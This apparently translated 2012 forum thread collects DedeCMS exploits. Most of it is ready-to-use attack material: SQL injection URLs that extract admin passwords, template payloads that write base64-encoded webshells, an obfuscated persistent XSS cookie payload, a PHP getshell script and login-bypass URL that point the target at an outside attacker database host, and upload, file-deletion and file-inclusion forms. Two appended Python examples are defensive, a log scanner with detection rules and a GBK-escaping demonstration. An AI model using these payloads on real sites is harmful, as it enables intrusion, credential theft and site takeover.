DedeCMS vulnerability summary

Thread starter, posted on 2012-10-18 10:42:14

DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After it is published, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php, a one-line webshell with password xiao.

DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage parameter XSS vulnerability
1. Copy and paste the URL below into the browser and open it; this triggers the XSS and installs the XSS "rootkit". Note that IE8/9 block URL-type XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; from then on, whichever of the URLs below is visited, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (straight into the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value, and you are taken straight into the site backend.

Prerequisite: the backend path must be known for this to work.

DedeCMS (织梦) tag remote file write vulnerability
Prerequisite: you need your own DedeCMS database prepared, with this row inserted: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image; then in attachment management replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports the edit succeeded, we have changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.

DedeCMS site management system get-shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after upload the image is stored as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; from that, drop 3 from the front and 1 from the end to get the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric overflow error on a field, together with DedeCMS writing database error messages into a PHP file whose header is not protected.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking confirm, seeing the same output as in step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
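The following is an added example and is not part of the original post: a small Python access-log scanner that recognises the request shapes collected in this thread from the defender's side. It flags parameter names used for configuration override (_COOKIE[GLOBALS][cfg_*], _POST[GLOBALS][cfg_*], cfg_basedir and friends), a raw sql parameter on plus/advancedsearch.php, script markup in gotopage, ".." in edit_face.php's oldface and carbuyaction.php's code, PHP markers in digg_frame.php's mid, and union/updatexml fragments in any parameter. The log lines are constructed, the rule names and the combined log format are my own choice, and the prefix list in OVERRIDE_PREFIX is taken from memory of DedeCMS's later common.inc.php request filter rather than from this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter-name prefixes the payloads in this thread use to override DedeCMS
# configuration ($cfg_dbhost and so on) from the request. Assumption: this is the
# prefix list DedeCMS's own common.inc.php later rejected; it is not on this page.
OVERRIDE_PREFIX = re.compile(r'^(cfg_|GLOBALS|_GET|_POST|_COOKIE)', re.I)

# SQL fragments taken from the injection URLs above: union select, updatexml(,
# the quote/|| probe against member/index.php, and the dede_ table prefix.
SQL_MARKERS = re.compile(r"(union\s+select|updatexml\s*\(|'\s*\|\||from\s+dede_)", re.I)

# Script-specific checks: (rule name, path suffix, predicate over decoded {name: value}).
ENDPOINT_RULES = [
    ('advancedsearch_raw_sql', '/plus/advancedsearch.php',
     lambda p: 'sql' in p),
    ('gotopage_xss', '/login.php',
     lambda p: re.search(r'[<>"]|script', p.get('gotopage', ''), re.I) is not None),
    ('edit_face_traversal', '/member/edit_face.php',
     lambda p: p.get('dopost') == 'delold' and '..' in p.get('oldface', '')),
    ('carbuyaction_lfi', '/plus/carbuyaction.php',
     lambda p: '../' in p.get('code', '')),
    ('digg_frame_php_in_error_log', '/plus/digg_frame.php',
     lambda p: re.search(r'\*/|<\?|\?>', p.get('mid', '')) is not None),
]

# Request line inside a combined-format access log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_params(target):
    """Split a request target into (path, [(name, value), ...]) with %xx decoded.
    Bytes that are not valid UTF-8 on their own (the lone %cf in the infosearch.php
    probe) become U+FFFD instead of raising, so the scan never stops on them."""
    parts = urlsplit(target)
    return parts.path, parse_qsl(parts.query, keep_blank_values=True, errors='replace')


def classify(path, params):
    """Return the sorted list of rule names the request matches ([] = nothing suspicious)."""
    hits = set()
    if any(OVERRIDE_PREFIX.match(name) for name, _ in params):
        hits.add('variable_override')
    if any(SQL_MARKERS.search(value) for _, value in params):
        hits.add('sql_injection')
    lookup = dict(params)  # a repeated name keeps its last value, which is enough here
    for rule, suffix, predicate in ENDPOINT_RULES:
        if path.endswith(suffix) and predicate(lookup):
            hits.add(rule)
    return sorted(hits)


def scan_log(lines):
    """Return [(client_ip, path, rules)] for every line matching at least one rule."""
    findings = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        path, params = decode_params(match.group('target'))
        rules = classify(path, params)
        if rules:
            findings.append((line.split(' ', 1)[0], path, rules))
    return findings


# Constructed access-log lines (not real traffic); the request targets mirror the URLs in the thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:40:01 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Oct/2012:10:41:10 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 880',
    '203.0.113.7 - - [18/Oct/2012:10:41:12 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.9&nocache=true HTTP/1.1" 200 45',
    '198.51.100.3 - - [18/Oct/2012:10:41:30 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3300',
    '198.51.100.3 - - [18/Oct/2012:10:41:45 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 60',
    '198.51.100.3 - - [18/Oct/2012:10:41:50 +0800] "GET /plus/carbuyaction.php?code=../../ HTTP/1.1" 200 60',
    '198.51.100.3 - - [18/Oct/2012:10:42:00 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 900',
    '198.51.100.3 - - [18/Oct/2012:10:42:05 +0800] "GET /member/index.php?uid=%27%27%20%7C%7C%20%27%27%27%27%20%7C%7C%20%27%27%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7%27%27 HTTP/1.1" 200 700',
]

if __name__ == '__main__':
    for ip, path, rules in scan_log(SAMPLE_LOG):
        print(f'{ip:<14} {path:<32} {", ".join(rules)}')
```

The mytag_js.php form and the PHP script in this thread send the override names in a POST body, which an access log does not record; the query-string variant in SAMPLE_LOG is there only so the rule can be exercised offline. Matching request bodies needs a WAF or full request logging in front of the application, and the same prefix check is what the application itself should apply to every incoming variable name.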
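The GBK injection against member/index.php and the %cf' probe against plus/infosearch.php above both depend on the same escaping failure: byte-oriented escaping (PHP's addslashes) inserts a 0x5C backslash after a lone lead byte, and a GBK connection then reads lead byte plus backslash as one character, leaving the quote in effect. The following is an added example, not code from the post: it compares that byte-level escaper with a charset-aware one on constructed inputs. The function names, the check quote_is_exposed, and the inputs are my own.

```python
# Constructed inputs: the GBK encoding of the Chinese string used in the
# member/index.php probe, and the lone 0xCF lead byte from the infosearch.php URL.
WIDE_TEXT = '涛声依旧'.encode('gbk')
LONE_LEAD_BYTE = b'\xcf'


def backslash_escape(raw: bytes) -> bytes:
    """Byte-level escaping in the style of PHP addslashes(): prefix ' " \\ and NUL with a
    backslash. It never looks at the character encoding, which is the whole problem."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_is_exposed(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes the way a connection using `charset` would and report
    whether a single quote survives without a backslash character in front of it."""
    text = escaped.decode(charset, errors='replace')
    return any(ch == "'" and (i == 0 or text[i - 1] != '\\')
               for i, ch in enumerate(text))


def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Decode first, escape at the character level, re-encode. A lead byte without a
    valid trail byte is rejected instead of being passed through to the database."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError(f'input is not valid {charset}: {exc}') from None
    text = (text.replace('\\', '\\\\').replace("'", "\\'")
                .replace('"', '\\"').replace('\x00', '\\0'))
    return text.encode(charset)


def demo():
    """Run both escapers over the two constructed inputs and return the outcomes."""
    lone_probe = LONE_LEAD_BYTE + b"'"   # 0xCF 0x27: 0x27 is not a valid GBK trail byte
    full_char_probe = WIDE_TEXT + b"'"   # complete GBK characters followed by a quote
    results = {
        # addslashes turns 0xCF 0x27 into 0xCF 0x5C 0x27; GBK reads 0xCF5C as one character
        'lone_lead_byte_naive': quote_is_exposed(backslash_escape(lone_probe), 'gbk'),
        # with complete characters the backslash stays on its own, so the quote is escaped
        'full_char_naive': quote_is_exposed(backslash_escape(full_char_probe), 'gbk'),
        'full_char_aware': quote_is_exposed(charset_aware_escape(full_char_probe, 'gbk'), 'gbk'),
    }
    try:
        charset_aware_escape(lone_probe, 'gbk')
        results['lone_lead_byte_aware'] = 'accepted'
    except ValueError:
        results['lone_lead_byte_aware'] = 'rejected'
    return results


if __name__ == '__main__':
    for name, outcome in demo().items():
        print(f'{name:<24} {outcome}')
```

The practical fix in an application is not a hand-written escaper at all: tell the database driver the connection charset so its own escaping is encoding-aware, and use parameterised queries where the driver offers them. The decode-first step above is what makes the lone lead byte fail loudly instead of being forwarded.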